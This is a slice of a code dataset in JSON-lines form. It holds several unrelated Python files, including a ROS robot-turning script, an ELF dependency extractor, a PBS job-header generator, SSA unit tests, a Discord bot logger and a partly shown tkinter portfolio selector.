\"\"\"\r\n rospy.loginfo(\"Shutting down turtlebot...\")\r\n self.cmd_vel.publish(Twist())\r\n rospy.sleep(1)\r\n rospy.loginfo(\"Goodbye.\")\r\n\r\n\r\n\r\ndef main():\r\n rospy.init_node(\"turn_to\")\r\n state = TurtlebotState()\r\n rospy.on_shutdown(state.shutdown)\r\n rate = rospy.Rate(20)\r\n\r\n\r\n # while not rospy.is_shutdown():\r\n # rate.sleep()\r\n # print(\"Closest Wall at angle:{}\".format(state.Hough_T))\r\n\r\n # pause for a bit\r\n for i in range(20):\r\n rate.sleep()\r\n\r\n\r\n angle = Hough_Transform(state.scan_msg) \r\n\r\n print(\"Closest Wall at angle:{}\".format(angle))\r\n\r\n\r\n\r\n state.current_action = Turn(state,-np.deg2rad(angle))\r\n while not rospy.is_shutdown():\r\n if not state.current_action.done:\r\n state.current_action.act()\r\n else:\r\n break\r\n rate.sleep()\r\n\r\n \r\n\r\n # #####################################\r\n # #Follow Object Code\r\n # # turn to closest object\r\n # state.current_action = TurnToObject(state)\r\n # while not rospy.is_shutdown():\r\n # if not state.current_action.done:\r\n # state.current_action.act()\r\n # else:\r\n # break\r\n # rate.sleep()\r\n\r\n # state.current_action = FollowObject(state)\r\n # while not rospy.is_shutdown():\r\n # if not state.current_action.done:\r\n # state.current_action.act()\r\n # else:\r\n # state.current_action = WallFollow(state)\r\n # rate.sleep()\r\n # #####################################\r\n\r\n\r\n # ######################################\r\n # #Wall Follow Code:\r\n # # turn to closest object\r\n # state.current_action = TurnToObject(state)\r\n # while not rospy.is_shutdown():\r\n # if not state.current_action.done:\r\n # state.current_action.act()\r\n # else:\r\n # break\r\n # rate.sleep()\r\n\r\n # state.current_action = WallFollow(state)\r\n # while not rospy.is_shutdown():\r\n # rospy.loginfo(\"state.meter\" + str(state.meter))\r\n # if not state.current_action.done:\r\n # state.current_action.act()\r\n # elif state.meter is True:\r\n # break\r\n # 
else:\r\n # state.current_action = WallFollow(state)\r\n # rate.sleep()\r\n\r\n # state.current_action = Turn(state,-pi/2)\r\n # while not rospy.is_shutdown():\r\n # if not state.current_action.done:\r\n # state.current_action.act()\r\n # else:\r\n # break\r\n # rate.sleep()\r\n\r\n # state.current_action = Drive(state, 1)\r\n # while not rospy.is_shutdown():\r\n # if not state.current_action.done:\r\n # state.current_action.act()\r\n # else:\r\n # break\r\n # rate.sleep()\r\n # #########################################\r\n\r\n\r\nmain()\r\n\r\n\r\n\r\n","sub_path":"HW5/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":16548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"362333437","text":"#!/usr/bin/env python3\n# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport argparse\nimport os\nimport subprocess\nimport sys\nfrom typing import List, NamedTuple, Set\n\nfrom antlir.fs_utils import Path\nfrom elftools.elf.dynamic import DynamicSection\nfrom elftools.elf.elffile import ELFFile\nfrom elftools.elf.segments import InterpSegment\n\n\nclass ExtractorOpts(NamedTuple):\n src_dir: Path\n dest_dir: Path\n files: List[Path]\n search: Set[Path] = set()\n\n\ndef parse(path: Path, opts: ExtractorOpts) -> Set[str]:\n \"\"\"\n Parse an elf file and return a tuple of: The interpretor and a list of\n all needed libraries\n \"\"\"\n with path.open(\"rb\") as f:\n _elf = ELFFile(f)\n deps = set()\n\n for segment in _elf.iter_segments():\n if isinstance(segment, InterpSegment):\n # This is the interpreter\n interp = Path(segment.get_interp_name())\n interpdir = interp.dirname()\n # Resolve to the symlinks for the common case that the\n # interpreter is in /lib64 which is actually a symlink to\n # /usr/lib64\n if interpdir.islink():\n interpdir = 
interpdir.realpath()\n interp = interpdir / interp.basename()\n if os.path.isabs(interp):\n interp = interp[1:]\n interp = opts.src_dir / interp\n interpdir = opts.src_dir / interpdir[1:]\n\n # Add the interp directory as a search path\n opts.search.add(interpdir)\n # Add the interpreter as a dependency\n deps.add(interp)\n\n # Get the RPATH/RUNPATH before looking for so files\n for section in _elf.iter_sections():\n if not isinstance(section, DynamicSection):\n continue\n for tag in section.iter_tags():\n if hasattr(tag, \"rpath\"):\n rpath = Path(tag.rpath)\n if os.path.isabs(rpath):\n rpath = rpath.relpath(\"/\")\n opts.search.add(opts.src_dir / rpath)\n\n for section in _elf.iter_sections():\n if isinstance(section, DynamicSection):\n for tag in section.iter_tags():\n if hasattr(tag, \"needed\"):\n dep_so_name = tag.needed\n\n # Search through the known search paths for the so\n for search in opts.search:\n dep_path = search / dep_so_name\n if os.path.exists(dep_path):\n deps.add(dep_path)\n deps.update(parse(dep_path, opts))\n\n return deps\n\n\ndef extract(opts: ExtractorOpts):\n # The set of files to extract from\n # the src dir\n to_extract = set()\n\n for binary in opts.files:\n path = opts.src_dir / binary[1:]\n to_extract.add(path)\n to_extract = to_extract.union(parse(path, opts))\n\n for extract in to_extract:\n target = Path(\n opts.dest_dir / os.path.relpath(extract, start=opts.src_dir)\n )\n subprocess.run([\"mkdir\", \"-p\", target.dirname().decode()], check=True)\n\n subprocess.run(\n [\n \"cp\",\n \"--recursive\",\n \"--no-clobber\",\n \"--dereference\",\n \"--reflink=auto\",\n \"--sparse=auto\",\n \"--preserve=all\",\n \"--no-preserve=links\",\n extract.decode(),\n target.decode(),\n ],\n check=True,\n )\n\n\ndef _parse_args(argv):\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"files\",\n nargs=\"+\",\n type=Path.from_argparse,\n help=\"One or more binaries to inspect and extract.\",\n )\n parser.add_argument(\n \"--src-dir\",\n 
required=True,\n type=Path.from_argparse,\n help=\"The source directory from where to find binaries\",\n )\n parser.add_argument(\n \"--dest-dir\",\n required=True,\n type=Path.from_argparse,\n help=\"The destination directory to deposit found binaries + deps\",\n )\n\n return ExtractorOpts(**Path.parse_args(parser, argv).__dict__)\n\n\ndef main(argv):\n extract(opts=_parse_args(argv))\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"antlir/bzl/genrule/extractor/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"515811354","text":"#!/usr/bin/env python\n# contact: xic@princeton.edu\n# date: 08/07/2018\n# log:\n# 08/07/2018 by xic:\n# initial version\n#\n\nfrom __future__ import division, print_function, absolute_import\nimport numpy as np\n\nscript_type_dict = {\n 'tcsh': '#!/bin/tcsh',\n 'python': '#!/usr/bin/env python',\n}\n\n\nclass header:\n \"\"\"This class synthesize the header content of a submittable batch job\"\"\"\n\n def __init__(self, batch_sys_type='moab'):\n self.setting = {}\n self._s = None\n self._extra_lines = []\n self.batch_sys_type = batch_sys_type\n return\n\n def _add_PBS_line(self, line):\n \"\"\"add a PBS (portable Batch Script) line\"\"\"\n self._s = self._s + '#PBS ' + line + '\\n'\n return\n\n def _check_key_value(self, key):\n \"\"\"check value of a specific key. 
If key does not exist, return None\"\"\"\n\n if not key in self.setting.keys():\n return None\n\n value = self.setting[key]\n\n return value\n\n # ====== APIs ======\n\n def add_line(self, line):\n \"\"\"add extra PBS lines\"\"\"\n self._extra_lines.append(line)\n return\n\n def get_header(self):\n \"\"\"output header to a string\"\"\"\n\n # === determine script type\n script_type = self._check_key_value('script_type')\n if script_type is None:\n script_type = 'tcsh'\n if script_type not in script_type_dict.keys():\n raise ValueError('script type: ' + script_type + ' is not supported...')\n\n self._s = script_type_dict[script_type] + '\\n'\n\n # === determine account\n account_name = self._check_key_value('account')\n if account_name is None:\n raise ValueError('account name is missing...')\n self._add_PBS_line('-A ' + account_name)\n\n # === determine walltime\n walltime = self._check_key_value('walltime')\n if walltime is None:\n raise ValueError('walltime is missing...')\n self._add_PBS_line('-l walltime=' + walltime)\n\n # === determine resource\n nodes = self._check_key_value('nodes')\n if nodes is None:\n nodes = 1\n line = '-l nodes={:d}'.format(nodes)\n ppn = self._check_key_value('ppn')\n if ppn is not None:\n line = line + ':ppn={:d}'.format(ppn)\n self._add_PBS_line(line)\n\n # === add extra lines\n for line in self._extra_lines:\n self._add_PBS_line(line)\n\n # === add one more blank line\n self._s += '\\n'\n\n return self._s\n\n\nif __name__ == '__main__':\n h = header()\n h.setting['account'] = 'nggps_gfdl'\n h.setting['nodes'] = 2\n h.setting['ppn'] = 36\n h.setting['walltime'] = '3:00:00'\n h.add_line('-l partition=c3')\n s = h.get_header()\n print(s)\n","sub_path":"poaipy/hpc/header.py","file_name":"header.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"488210160","text":"import unittest\nfrom .ssa import SsaVariable, SsaCode\nfrom 
Common.cfg_common import *\n\n\nclass TestSsa(unittest.TestCase):\n def assert_ssa(self, ssa, target, left_oprd, right_oprd, operator=None):\n self.assertEqual(str(ssa.target), target)\n self.assertEqual(str(ssa.left_oprd), left_oprd)\n self.assertEqual(str(ssa.right_oprd), right_oprd)\n\n if operator is not None:\n self.assertEqual(ssa.operator, operator)\n\n def assert_ssa_list(self, ssa_list, target_list, left_oprd_list, right_oprd_list, operator_list=None):\n for i in range(len(ssa_list)):\n if operator_list is not None:\n self.assert_ssa(ssa_list[i], target_list[i], left_oprd_list[i], right_oprd_list[i], operator_list[i])\n else:\n self.assert_ssa(ssa_list[i], target_list[i], left_oprd_list[i], right_oprd_list[i], None)\n\n def assertVariableVersionStack(self, real_dict, expected_dict):\n self.assertEqual(len(real_dict), len(expected_dict))\n for var, stack in real_dict.items():\n self.assertListEqual(stack.items, expected_dict[var])\n\n def test_SsaVariable_generation(self):\n ssa_var = SsaVariable('a')\n self.assertEqual(str(ssa_var), 'a_0')\n\n ssa_var = SsaVariable(3)\n self.assertEqual(str(ssa_var), '3')\n\n def test_ssa_generation_1_stmt(self):\n as_tree = ast.parse(ms(\"\"\"\\\n z = a + y\"\"\"))\n\n ssa_code = SsaCode(as_tree)\n expected_ssa_dict = {'z': [0], 'a': [0], 'y': [0]}\n self.assertEqual(str(ssa_code), \"z_0 = a_0 + y_0\\n\")\n self.assertVariableVersionStack(ssa_code.var_version_list, expected_ssa_dict)\n\n def test_ssa_generation_number(self):\n as_tree = ast.parse(ms(\"\"\"\\\n z = 4\"\"\"))\n\n ssa_code = SsaCode(as_tree)\n expected_ssa_dict = {'z': [0], 4: [0]}\n self.assertEqual(str(ssa_code), \"z_0 = 4\\n\")\n self.assertVariableVersionStack(ssa_code.var_version_list, expected_ssa_dict)\n\n def test_ssa_generation_2_stmt(self):\n as_tree = ast.parse(ms(\"\"\"\\\n z = a + y\n x = b + c\"\"\"))\n\n ssa_code = SsaCode(as_tree)\n expected_ssa_dict = {'z': [0], 'a': [0], 'y': [0], 'x': [0], 'b': [0], 'c': [0]}\n 
self.assertEqual(str(ssa_code), ms(\"\"\"\\\n z_0 = a_0 + y_0\n x_0 = b_0 + c_0\n \"\"\"))\n self.assertVariableVersionStack(ssa_code.var_version_list, expected_ssa_dict)\n\n def test_ssa_generation_2_stmt_expect_update_target(self):\n as_tree = ast.parse(ms(\"\"\"\\\n z = a + y\n z = a\"\"\"))\n\n ssa_code = SsaCode(as_tree)\n expected_ssa_dict = {'z': [0, 1], 'a': [0], 'y': [0]}\n self.assertEqual(str(ssa_code), \"z_0 = a_0 + y_0\\nz_1 = a_0\\n\")\n self.assertVariableVersionStack(ssa_code.var_version_list, expected_ssa_dict)\n\n def test_ssa_generation_2_stmt_expect_update_target_multiple_time(self):\n as_tree = ast.parse(ms(\"\"\"\\\n z = a + y\n z = a + y\n z = a\n a = y\"\"\"))\n\n ssa_code = SsaCode(as_tree)\n expected_ssa_dict = {'z': [0, 1, 2], 'a': [0, 1], 'y': [0]}\n self.assertEqual(str(ssa_code), ms(\"\"\"\\\n z_0 = a_0 + y_0\n z_1 = a_0 + y_0\n z_2 = a_0\n a_1 = y_0\n \"\"\"))\n\n self.assertVariableVersionStack(ssa_code.var_version_list, expected_ssa_dict)\n\n def test_ssa_all_valid_expressions(self):\n as_tree = ast.parse(ms(\"\"\"\\\n a = b + c\n d = 2 * e\n f = g / 3\n h = - 4\n i = + j\n k = 1 < 3\n l = k | m\n n = o ^ 2\"\"\")\n )\n\n ssa_code = SsaCode(as_tree)\n\n self.assertEqual(str(ssa_code), ms(\"\"\"\\\n a_0 = b_0 + c_0\n d_0 = 2 * e_0\n f_0 = g_0 / 3\n h_0 = - 4\n i_0 = + j_0\n k_0 = 1 < 3\n l_0 = k_0 | m_0\n n_0 = o_0 ^ 2\n \"\"\"))\n\n def test_ssa_repeated_expression(self):\n as_tree = ast.parse(ms(\"\"\"\\\n c = d + e\n e = 5\n d = d + e\n d = d + e\n c = d + e\n c = d + e\"\"\")\n )\n\n ssa_code = SsaCode(as_tree)\n self.assertEqual(str(ssa_code), ms(\"\"\"\\\n c_0 = d_0 + e_0\n e_1 = 5\n d_1 = d_0 + e_1\n d_2 = d_1 + e_1\n c_1 = d_2 + e_1\n c_2 = d_2 + e_1\n \"\"\"))\n","sub_path":"lvn_optimization/Version2/test_ssa.py","file_name":"test_ssa.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"50080396","text":"import 
collections\n\n\ndef calculing_items(chave, valor, T, d, D):\n for key, val in T.items():\n if key == chave:\n val = int(val)\n totalDivisao = int(valor/val)\n restoDivisao = valor%val\n for key, val in d.items():\n if key == chave:\n val = int(val)\n totalCountSpecialPrice = totalDivisao * val\n print (\"Special Price Amount: \", totalCountSpecialPrice, \"Item: \", key)\n for key, val in D.items():\n val = int(val)\n if key == chave:\n totalCountNormalPrice = restoDivisao * val\n print (\"Normal Price Amount: \", totalCountNormalPrice, \"Item: \", key)\n print (\"Total Amount: \", totalCountSpecialPrice+totalCountNormalPrice, \"Item: \", key)\n print ()\n\n\ndef special_price_as_dict():\n d = {}\n print ('Here you will input the SPECIAL price')\n while True:\n chave = input('Plz input the name of item: ')\n if chave == 'quit':\n break\n valor = input('Plz input the special price of this item: ')\n d[chave] = valor\n return d\n #for key, val in d.items():\n # print (key, \"your value: \", val) \n\ndef special_price_buying_more_than_one():\n T = {}\n print ('Plz insert TOTAL units to get the special price: ')\n while True:\n chave = input('Plz input the name of item: ')\n if chave == 'quit':\n break\n valor = input('Plz input how many items to get special price: ')\n T[chave] = valor\n return T\n\ndef normal_price_as_dict():\n D = {}\n print ('Here you will input the NORMAL price')\n while True:\n chave = input('Plz input the name of item: ')\n if chave == 'quit':\n break\n valor = input('Plz input the normal price of this item: ')\n D[chave] = valor\n return D\n\ndef your_order():\n shopList = []\n print ()\n maxList = int(input('How many items will you buy right now? 
'))\n count = 0\n while count < maxList:\n print ()\n item = input('Scanning your item: ')\n print ()\n shopList.append(item)\n count = count + 1\n print (shopList)\n shopList.sort()\n print (\"That's your Shopping List: \", shopList)\n print ()\n return shopList\n\ndef frequence_of_items():\n d = special_price_as_dict()\n T = special_price_buying_more_than_one()\n D = normal_price_as_dict()\n getShopList = your_order() \n freq_counter = collections.Counter(getShopList)\n print (\"That's a sum of each Item that you bought: \", freq_counter)\n print ()\n for key, val in freq_counter.items():\n calculing_items(key, val, T, d, D) \n\nfrequence_of_items()\n\n","sub_path":"DesafioQA.py","file_name":"DesafioQA.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"447167115","text":"class RingBuffer:\n def __init__(self, capacity):\n self.capacity = capacity\n self.current = 0\n self.storage = [None]*capacity\n\n def append(self, item):\n if not self.storage[0] == None:\n self.storage[self.current] = item\n if self.current < self.capacity-1:\n self.current += 1\n else:\n self.current = 0\n else:\n del self.storage[0]\n self.storage.append(item)\n\n def get(self):\n orderedlist = [None]*self.capacity\n for i in range(len(self.storage)):\n del orderedlist[-1]\n orderedlist.insert(0, self.storage[i])\n orderedlist.reverse()\n checked = False\n while not checked:\n if orderedlist[-1] == None:\n del orderedlist[-1]\n elif orderedlist[0] == None:\n del orderedlist[0]\n else:\n checked = True\n return orderedlist","sub_path":"ring_buffer/ring_buffer.py","file_name":"ring_buffer.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"225846314","text":"import sys\nimport json\nimport itertools\nimport numpy as np\nfrom scipy.optimize import differential_evolution\n\n# param = 
json.loads(sys.argv[1])\n\n# num_ts = param['num-targets']\n# k = param['resource-limit']\n# lmd = param['rationality']\n# w1, w2, w3 = param['weights']\n# rs_d = np.array(param['defender-rewards'])\n# ps_d = np.array(param['defender-penalties'])\n# rs_a = np.array(param['attacker-rewards'])\n# ps_a = np.array(param['attacker-penalties'])\n\n# def quantal_response(xs):\n# us = w1 * xs + w2 * rs_a * w3 * ps_a\n# exp_lmd_us = np.exp(lmd * us)\n# sum_exp_lmd_us = np.sum(exp_lmd_us)\n# return exp_lmd_us / sum_exp_lmd_us\n\n# def conditional_expectation(xs):\n# qs = quantal_response(xs)\n# return np.sum(qs * (xs * rs_d + (1 - xs) * ps_d))\n\n# def cost_function(xs):\n# if np.sum(xs) <= k:\n# return -1 * conditional_expectation(xs)\n# else:\n# return 1000 # some high value\n\n# bounds = [(0.0, 1.0)] * num_ts\n# result = differential_evolution(cost_function, bounds)\n\n# opts = result.x.tolist()\n# print(json.dumps({'optimal-coverages': opts}))\n\nTheta_1 = list(range(0, 3))\nnum_Theta_1 = 3\n\nT = list(range(0, 8))\nnum_T = 8\n\nk = 5\n\nl = []\nfor c in list(itertools.combinations_with_replacement(T, k)):\n v = [0.0] * num_T\n r = 1.0 / k\n for i in list(c):\n v[i] += r\n l.append(v)\n\nnum_A_1 = len(l)\nA_1 = list(range(0, num_A_1))\n\nI = [[0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.65],\n [0.1, 0.3, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1],\n [0.1, 0.1, 0.1, 0.1, 0.3, 0.1, 0.1, 0.1]]\n\np = [0.5, 0.25, 0.25]\n\ndef cos_sim(v1, v2): np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))\n\ndef f(x):\n n = 0.0\n for theta_1 in Theta_1:\n for a_1 in A_1:\n r = 0.0\n for t in T:\n r += l[a_1][t] * I[theta_1][t]\n n += p[theta_1] * x[a_1] * r\n m = 0.0\n for a_1i in A_1:\n for a_1j in A_1:\n m += x[a_1i] * x[a_1j] * cos_sim(l[a_1i], l[a_1j])\n return n + m\n\n# def cost_fun(x):\n# if np.sum(x) <= 1.0:\n# return -1 * f(x)\n# else:\n# return 1000 # some high value\n\ndef cost_fun(x): -1 * f(x)\n\nbounds = [(0.0, 1.0)] * num_A_1\nresult = differential_evolution(cost_fun, 
bounds)\n\nopts = result.x.tolist()\nprint(json.dumps({'optimal-strategy': opts}))\n\n","sub_path":"src/main/resources/find_optimal_mixed_strategy.py","file_name":"find_optimal_mixed_strategy.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"554686609","text":"import logging\nimport os\nimport sys\nimport traceback\nfrom datetime import datetime\nfrom logging.handlers import TimedRotatingFileHandler\n\nimport discord\nfrom discord.ext import commands\n\nfrom Util import Configuration\n\nLOGGER = logging.getLogger('gearbot')\nDISCORD_LOGGER = logging.getLogger('discord')\n\n\nBOT_LOG_CHANNEL:discord.TextChannel\nSTARTUP_ERRORS = []\nBOT:commands.AutoShardedBot = None\n\n\ndef init_logger():\n LOGGER.setLevel(logging.DEBUG)\n DISCORD_LOGGER.setLevel(logging.DEBUG)\n\n formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s')\n\n handler = logging.StreamHandler(stream=sys.stdout)\n handler.setLevel(logging.INFO)\n handler.setFormatter(formatter)\n LOGGER.addHandler(handler)\n DISCORD_LOGGER.addHandler(handler)\n\n if not os.path.isdir(\"logs\"):\n os.mkdir(\"logs\")\n handler = TimedRotatingFileHandler(filename='logs/gearbot.log', encoding='utf-8', when=\"midnight\", backupCount=30)\n handler.setFormatter(formatter)\n handler.setLevel(logging.INFO)\n DISCORD_LOGGER.addHandler(handler)\n LOGGER.addHandler(handler)\n\n\n handler = TimedRotatingFileHandler(filename='logs/discord.log', encoding='utf-8', when=\"h\", interval=4, backupCount=30)\n DISCORD_LOGGER.addHandler(handler)\n\n\nasync def onReady(bot:commands.Bot, channelID):\n global BOT_LOG_CHANNEL, BOT\n BOT = bot\n BOT_LOG_CHANNEL = bot.get_channel(int(channelID))\n if BOT_LOG_CHANNEL is None:\n LOGGER.error(\"==========================Logging channel is misconfigured, aborting startup!==========================\")\n await bot.logout()\n\n if len(STARTUP_ERRORS) > 0:\n await bot_log(\n 
f\":rotating_light: Caught {len(STARTUP_ERRORS)} {'exceptions' if len(STARTUP_ERRORS) > 1 else 'exception'} during startup.\")\n for e in STARTUP_ERRORS:\n await e\n\n\ndef info(message):\n LOGGER.info(message)\n\n\ndef warn(message):\n LOGGER.warning(message)\n\n\ndef error(message):\n LOGGER.error(message)\n\ndef exception(message, error):\n LOGGER.error(message)\n trace = \"\"\n LOGGER.error(str(error))\n for line in traceback.format_tb(error.__traceback__):\n trace = f\"{trace}\\n{line}\"\n LOGGER.error(trace)\n\n\nasync def bot_log(message = None, embed = None):\n if BOT_LOG_CHANNEL is not None:\n return await BOT_LOG_CHANNEL.send(content=message, embed=embed)\n else:\n STARTUP_ERRORS.append(bot_log(message, embed))\n\nasync def log_to(guild_id, type, message=None, embed=None, file=None):\n channels = Configuration.get_var(guild_id, \"LOG_CHANNELS\")\n for cid, info in channels.items():\n if type in info:\n channel = BOT.get_channel(int(cid))\n if channel is not None:\n permissions = channel.permissions_for(BOT.get_guild(guild_id).me)\n if permissions.send_messages and (embed is None or permissions.embed_links) and (file is None or permissions.attach_files):\n if Configuration.get_var(guild_id, \"TIMESTAMPS\"):\n message = f\"[{datetime.strftime(datetime.now(), '%H:%M:%S')}] {message}\"\n await channel.send(message, embed=embed, file=file)\n\nasync def message_owner(bot, message):\n if bot.owner_id is None:\n app = await bot.application_info()\n bot.owner_id = app.owner.id\n owner = bot.get_user(bot.owner_id)\n dm_channel = owner.dm_channel\n if dm_channel is None:\n await owner.create_dm()\n await owner.dm_channel.send(message)","sub_path":"GearBot/Util/GearbotLogging.py","file_name":"GearbotLogging.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"364920528","text":"# !/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\nimport predict.config.error as 
error\r\n\r\n'''\r\n框架和插件里的所有class,都必须继承该基类 (里面封装了一系列设置错误信息的方法)\r\n'''\r\nclass base(object):\r\n # 初始化错误号、错误队列\r\n def __initError(self):\r\n setattr(self, '__error', True)\r\n setattr(self, '__errorQueue', [])\r\n self.__error = {'no': 0, 'msg': ''}\r\n self.__errorQueue = []\r\n\r\n # 设置错误号,错误信息\r\n # 错误信息会自动带上捕捉到的错误的具体信息,以及错误号对应的错误信息;若不需要额外添加其他错误信息,无需写err_msg\r\n def setError(self, err_no, err_msg=''):\r\n self.setErrorNo(err_no, err_msg)\r\n self.__errorQueue.append({\r\n 'no': err_no,\r\n 'msg': self.__error['msg'],\r\n })\r\n\r\n # 只设置错误号,不将错误信息保存到错误队列\r\n def setErrorNo(self, err_no, err_msg=''):\r\n if not hasattr(self, '__errorQueue'):\r\n self.__initError()\r\n\r\n if err_no == 0:\r\n return\r\n\r\n import sys\r\n info = sys.exc_info()\r\n\r\n self.__error['no'] = err_no\r\n self.__error['msg'] = error.getInfo(err_no) + '; ' + str(info[0]) + ': ' + str(info[1])\r\n if err_msg:\r\n if self.__error['msg']:\r\n self.__error['msg'] += ' '\r\n self.__error['msg'] += err_msg\r\n\r\n # 合并错误队列\r\n def mergeErrorQueue(self, queue):\r\n if not hasattr(self, '__errorQueue'):\r\n self.__initError()\r\n self.__errorQueue += queue\r\n\r\n # 获取最近一次错误的错误对象 {'no': xxx, 'msg': xxx}\r\n def getError(self):\r\n if not hasattr(self, '__errorQueue'):\r\n self.__initError()\r\n return self.__error\r\n\r\n # 获取错误队列\r\n def getErrorQueue(self):\r\n if not hasattr(self, '__errorQueue'):\r\n self.__initError()\r\n return self.__errorQueue\r\n\r\n # 获取最近一次错误的错误号\r\n def getErrorNo(self):\r\n if not hasattr(self, '__errorQueue'):\r\n self.__initError()\r\n return self.__error['no']\r\n\r\n # 重置最近一次的错误,但不重置 errorQueue\r\n def resetErrorNo(self):\r\n if not hasattr(self, '__errorQueue'):\r\n self.__initError()\r\n self.__error = {'no': 0, 'msg': ''}\r\n\r\n # 判断最近是否有出错\r\n def hasError(self):\r\n if not hasattr(self, '__errorQueue'):\r\n return False\r\n if self.__error['no'] == 0:\r\n return False\r\n return 
True\r\n","sub_path":"predict/lib/baseObject.py","file_name":"baseObject.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"233157387","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 9 18:56:52 2019\n\n@author: nana\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom pypfopt.efficient_frontier import EfficientFrontier\nfrom pypfopt import risk_models\nfrom pypfopt import expected_returns\nfrom pypfopt.discrete_allocation import DiscreteAllocation, get_latest_prices\nimport bt\nimport matplotlib.pyplot as plt\nimport tkinter as tk\nimport plotly.graph_obkects as go\n\n\nroot = tk.Tk()\n \ncategories = pd.read_csv('ModelingData.csv', index_col = \"Categories\")\ntickersCount=[]\ntickersCount.append(categories.iloc[0])\nprint(len(tickersCount))\ntickersInd=[]\ntickersCoun=[]\ntickersCap=[]\nstartDate=[]\nendDate=[]\n\nTech = tk.IntVar()\nConCy = tk.IntVar()\nInd = tk.IntVar()\nEnergy = tk.IntVar() \nComm = tk.IntVar()\nHealth = tk.IntVar()\n\nusa = tk.IntVar()\nger = tk.IntVar()\nchn = tk.IntVar()\nire = tk.IntVar()\nnl = tk.IntVar()\njpn = tk.IntVar()\nindia = tk.IntVar()\nisr = tk.IntVar()\nca = tk.IntVar()\n\nlc = tk.IntVar()\nmc = tk.IntVar()\nsc = tk.IntVar()\n\nbefore = tk.IntVar()\nduring = tk.IntVar()\nafter = tk.IntVar()\n\ntk.Label(root, text=\"Industry: \").grid(row=0, column=0)\ntk.Checkbutton(root, text=\"Tech\", variable=Tech).grid(row=1, column=1)\ntk.Checkbutton(root, text=\"Consumer Cyclical\", variable=ConCy).grid(row=1, column=2)\ntk.Checkbutton(root, text=\"Industrials\", variable=Ind).grid(row=1, column=3)\ntk.Checkbutton(root, text=\"Energy\", variable=Energy).grid(row=1, column=4)\ntk.Checkbutton(root, text=\"Communication Services\", variable=Comm).grid(row=1, column=5)\ntk.Checkbutton(root, text=\"Healthcare\", variable=Health).grid(row=1, column=6)\n\ntk.Label(root, text=\"Country: \").grid(row=2, 
column=0)\ntk.Checkbutton(root, text=\"USA\", variable=usa).grid(row=3, column=1)\ntk.Checkbutton(root, text=\"Germany\", variable=ger).grid(row=3, column=2)\ntk.Checkbutton(root, text=\"China\", variable=chn).grid(row=3, column=3)\ntk.Checkbutton(root, text=\"Ireland\", variable=ire).grid(row=3, column=4)\ntk.Checkbutton(root, text=\"Netherlands\", variable=nl).grid(row=3, column=5)\ntk.Checkbutton(root, text=\"Japan\", variable=jpn).grid(row=3, column=6)\ntk.Checkbutton(root, text=\"India\", variable=india).grid(row=3, column=7)\ntk.Checkbutton(root, text=\"Israel\", variable=isr).grid(row=3, column=8)\ntk.Checkbutton(root, text=\"Canada\", variable=ca).grid(row=3, column=9)\n\ntk.Label(root, text=\"Market Cap: \").grid(row=4, column=0)\ntk.Checkbutton(root, text=\"Large Cap\", variable=lc).grid(row=5, column=1)\ntk.Checkbutton(root, text=\"Medium Cap\", variable=mc).grid(row=5, column=2)\ntk.Checkbutton(root, text=\"Small Cap\", variable=sc).grid(row=5, column=3)\n\ntk.Label(root, text=\"Time Horizon (Relative to Financial Crisis): \").grid(row=6, column=0)\ntk.Checkbutton(root, text=\"Before\", variable=before).grid(row=7, column=1)\ntk.Checkbutton(root, text=\"During\", variable=during).grid(row=7, column=2)\ntk.Checkbutton(root, text=\"After\", variable=after).grid(row=7, column=3)\n\n\ndef csvedit():\n if Tech.get() == 1 :\n for i in range(1,135):\n if categories.iat[2, i] == \"Tech\":\n if categories.iat[0,i] not in tickersInd :\n tickersInd.append(categories.iat[0,i])\n print(tickersInd)\n\n if ConCy.get() == 1 :\n for i in range(1,135):\n if categories.iat[2, i] == \"Consumer Cyclical\":\n if categories.iat[0,i] not in tickersInd :\n tickersInd.append(categories.iat[0,i])\n print(tickersInd)\n\n if Ind.get() == 1 :\n for i in range(1,135):\n if categories.iat[2, i] == \"Industrials\":\n if categories.iat[0,i] not in tickersInd :\n tickersInd.append(categories.iat[0,i])\n print(tickersInd)\n\n if Energy.get() == 1 :\n for i in range(1,135):\n if 
